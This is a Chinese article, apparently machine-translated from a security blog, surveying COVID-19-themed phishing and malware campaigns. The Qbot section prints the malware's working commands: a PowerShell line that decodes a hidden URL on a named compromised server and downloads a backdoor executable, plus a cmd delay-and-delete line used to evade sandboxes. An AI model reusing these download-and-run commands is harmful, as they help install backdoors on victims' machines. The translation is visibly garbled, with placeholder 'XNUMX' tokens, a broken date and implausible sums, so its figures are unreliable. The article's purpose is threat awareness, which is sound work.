攻击者继续利用 COVID-19 主题,为对与该流行病相关的一切都非常感兴趣的用户制造越来越多的威胁。 在 我们已经讨论了冠状病毒之后出现了哪些类型的恶意软件,今天我们将讨论包括俄罗斯在内的不同国家的用户已经遇到的社会工程技术。 一般趋势和示例都在剪切范围内。
记得在 我们谈到人们不仅愿意阅读有关冠状病毒和流行病过程的信息,还愿意阅读有关财政支持措施的信息? 这是一个很好的例子。 德国北莱茵-威斯特法伦州或北威州发现了一次有趣的网络钓鱼攻击。 攻击者创建了经济部网站的副本(),任何人都可以申请经济援助。 这样的程序确实存在,而且事实证明它对诈骗者有利。 收到受害者的个人数据后,他们在真正的部门网站上提出了申请,但提供了其他银行详细信息。 根据官方数据,在该计划被发现之前,已经发出了 4 次此类虚假请求。 结果,原本为受影响公民提供的 109 亿美元落入了欺诈者手中。
您想要免费检测 COVID-19 吗?
以冠状病毒为主题的网络钓鱼的另一个重要例子是 在电子邮件中。 这些消息吸引了用户的注意,并提出免费接受冠状病毒感染检测。 在这些附件中 有 Trickbot/Qakbot/Qbot 的实例。 当那些希望检查自己健康状况的人开始“填写随附的表格”时,恶意脚本就会被下载到计算机上。 为了避免沙盒测试,该脚本仅在一段时间后(当保护系统确信不会发生恶意活动时)才开始下载主要病毒。
说服大多数用户启用宏也很容易。 为此,使用了一个标准技巧:要填写调查问卷,您首先需要启用宏,这意味着您需要运行 VBA 脚本。
正如您所看到的,VBA 脚本经过专门屏蔽,免受防病毒软件的攻击。
Windows 有一个等待功能,应用程序在接受默认的“是”答案之前等待 /T <秒>。 在我们的例子中,脚本在删除临时文件之前等待了 65 秒:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
在等待期间,恶意软件被下载。 为此启动了一个特殊的 PowerShell 脚本:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
解码 Base64 值后,PowerShell 脚本会下载位于先前被黑客入侵的德国 Web 服务器上的后门:
http://automatischer-staubsauger.com/feature/777777.png并将其保存在名称下:
C:UsersPublictmpdirfile1.exe
夹 ‘C:UsersPublictmpdir’ 运行包含该命令的“tmps1.bat”文件时被删除 cmd /c mkdir ""C:UsersPublictmpdir"".
针对政府机构的针对性攻击
此外,FireEye 分析师最近报告了针对武汉政府机构以及中国应急管理部的 APT32 攻击。 其中一份分发的 RTF 包含纽约时报文章的链接,标题为 。 然而,在阅读后,恶意软件被下载(FireEye 分析师将该实例识别为 METALJACK)。
有趣的是,根据 Virustotal 的说法,在检测时,没有任何防病毒软件检测到此实例。
当官方网站瘫痪时
网络钓鱼攻击最引人注目的例子就在前几天发生在俄罗斯。 原因是为 3 至 16 岁儿童指定了一项期待已久的福利。 当 12 年 2020 月 XNUMX 日宣布开始接受申请时,数百万人涌向国家服务网站寻求期待已久的帮助,并导致该门户网站瘫痪,其严重程度不亚于专业的 DDoS 攻击。 当总统说“政府服务无法应对申请流程”时,人们开始在网上讨论推出另一个接受申请的网站。
问题是,几个网站同时开始工作,而真正的网站 posobie16.gosuslugi.ru 实际上接受申请,但更多 .
SearchInform 的同事在 .ru 区域中发现了大约 30 个新的欺诈域名。 自70月初以来,Infosecurity和Softline Company已追踪到16多个类似的虚假政府服务网站。 它们的创作者使用了熟悉的符号,还使用了 gosuslugi、gosuslugi-XNUMX、vyplaty、covid-vyplaty、posobie 等单词的组合。
炒作和社会工程
所有这些例子都只能证实攻击者正在成功地利用冠状病毒主题获利。 社会紧张程度越高,问题越不明确,诈骗者窃取重要数据、迫使人们自己放弃金钱或干脆入侵更多计算机的机会就越大。
鉴于疫情迫使可能毫无准备的人们集体在家工作,不仅个人数据,而且公司数据都面临风险。 例如,最近Microsoft 365(以前称为Office 365)用户也遭受了网络钓鱼攻击。 人们收到大量“错过”的语音信息作为信件的附件。 然而,这些文件实际上是一个 HTML 页面,将攻击的受害者发送到 。 因此,帐户中的所有数据都会失去访问权限并受到损害。
来源: habr.com